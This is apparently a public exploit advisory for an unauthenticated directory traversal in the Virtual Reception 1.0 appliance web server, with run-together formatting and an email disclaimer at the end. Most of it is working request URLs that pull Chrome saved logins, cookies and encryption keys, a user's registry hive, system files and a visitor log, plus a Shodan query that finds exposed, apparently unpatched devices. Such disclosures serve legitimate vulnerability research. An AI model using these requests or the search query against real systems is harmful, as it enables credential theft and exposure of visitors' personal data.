Headline
Virtual Reception 1.0 Directory Traversal
Virtual Reception version 1.0 suffers from a directory traversal vulnerability.
# Exploit Title: Virtual Reception v1.0 - Web Server Directory Traversal# Exploit Author: Spinae# Vendor Homepage: https://www.virtualreception.nl/# Version: win7sp1_rtm.101119-1850 6.1.7601.1.0.65792 running on an Intel NUC5i5RY# Tested on: allWe discovered the web server of the Virtual Reception appliance is prone toan unauthenticated directory traversal vulnerability. This allows anattacker to traverse outside the server root directory by specifying filesat the end of a URL request.This is a NUC5i5RYhttp://[ip address]/c:/WINDOWS/System32/drivers/etc/hostshttp://[ip address]/C:/windows/WindowsUpdate.log...A user called 'receptie' exists on the Windows system:http://[ip address]/c:/users/receptie/ntuser.dathttp://[ip address]/c:/users/receptie/ntuser.inihttp://[ip address]/c:/users/receptie/appdata/local/temp/wmsetup.log...http://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/UserData/Default/Login Datahttp://[ipaddress]/c:/users/receptie/AppData/Local/Google/Chrome/User%20Data/Local%20Statehttp://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/UserData/Default/Cookies...The appliance also keeps a log of the visitors that register at theentrance:http://[ip address]/visitors.csvhash icon for shodan searches:https://www.shodan.io/search?query=http.favicon.hash%3A656388049No reply from the vendor (phone, email, website form submissions), firstreported in 2021.-- DISCLAIMER: Unless indicated otherwise, the information contained in this message is privileged and confidential, and is intended only for the use of the addressee(s) named above and others who have been specifically authorized to receive it. If you are not the intended recipient, you are hereby notified that any dissemination, distribution or copying of this message and/or attachments is strictly prohibited. The company accepts no liability for any damage caused by any virus transmitted by this message. Furthermore, the company does not warrant a proper and complete transmission of this information, nor does it accept liability for any delays. If you have received this message in error, please contact the sender and delete the message. Thank you.